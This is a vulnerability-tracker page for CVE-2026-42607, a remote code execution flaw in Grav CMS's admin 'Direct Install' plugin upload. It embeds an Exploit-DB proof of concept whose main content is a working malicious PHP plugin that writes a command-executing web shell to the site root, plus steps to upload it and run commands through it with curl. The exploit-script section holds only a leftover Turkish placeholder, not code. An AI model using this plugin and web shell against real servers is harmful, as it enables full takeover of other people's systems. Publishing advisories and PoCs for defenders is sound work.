CVE-2026-42607

critical

Published 2026-05-05 · Modified 2026-05-13

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

9.1

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

10.0

Description

Grav Vulnerable to Remote Code Execution (RCE) via Malicious Plugin ZIP Upload in Direct Install Feature

Predictions

Exploit likelihood

100%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-52578 webapps php text · 2 KB

Mustafa Murat Akgül · 2026-05-26

Grav CMS 2.0.0-beta.2 - Remote Code Execution

text exploit Source: Exploit-DB

# Exploit Title: Grav CMS < 2.0.0-beta.2 - Remote Code Execution (RCE) 
# Date: 2026-05-08
# Exploit Author: Mustafa Murat Akgül
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav
# Version: < 2.0.0-beta.2
# CVE: CVE-2026-42607 / GHSA-w48r-jppp-rcfw
# Tested on: Linux/Ubuntu (Grav Admin Plugin Enabled)

Technical Details:
The Grav CMS "Direct Install" feature in the Admin plugin allows administrators 
to upload plugins as ZIP files. The system failed to adequately validate the 
contents of the ZIP archive or prevent path traversal (Zip Slip) during extraction. 
By crafting a malicious plugin that hooks into Grav events (e.g., onPluginsInitialized), 
an attacker can execute arbitrary PHP code or drop a persistent web shell on the root directory.

Proof of Concept (PoC):

1. Create a malicious plugin structure:
   - shellplugin/blueprints.yaml
   - shellplugin/shellplugin.yaml
   - shellplugin/shellplugin.php (Payload below)

--- shellplugin.php ---
<?php
namespace Grav\Plugin;
use Grav\Common\Plugin;

class ShellpluginPlugin extends Plugin {
    public static function getSubscribedEvents(): array {
        return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
    }
    public function onPluginsInitialized(): void {
        $shell_path = GRAV_ROOT . '/shell.php';
        if (!file_exists($shell_path)) {
            file_put_contents($shell_path, '<?php system($_GET["cmd"]); ?>');
        }
    }
}
----------------------

2. Compress the directory:
   $ zip -r shellplugin.zip shellplugin/

3. Log in to the Grav Admin panel and navigate to:
   /admin/tools/direct-install

4. Upload the 'shellplugin.zip' file.

5. Once installed, the plugin triggers on the next request to the site, 
   dropping a shell at the root.

6. Access your shell:
   curl "http://<target>/shell.php?cmd=id"

Exploit Script (Python):
[Buraya yukarıda paylaştığın Python scriptini ekleyebilirsin]

Impact:
Full system-level access under the context of the web server user. An attacker 
with administrative privileges (or via CSRF) can compromise the entire server.

Package impact

Ecosystem	Package	Vulnerable	Fixed
Packagist	getgrav/grav	`<2.0.0-beta.2`	`2.0.0-beta.2`
COMPOSER	getgrav/grav	`< 2.0.0-beta.2`	`2.0.0-beta.2`

References

CWEs

CWE-94

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.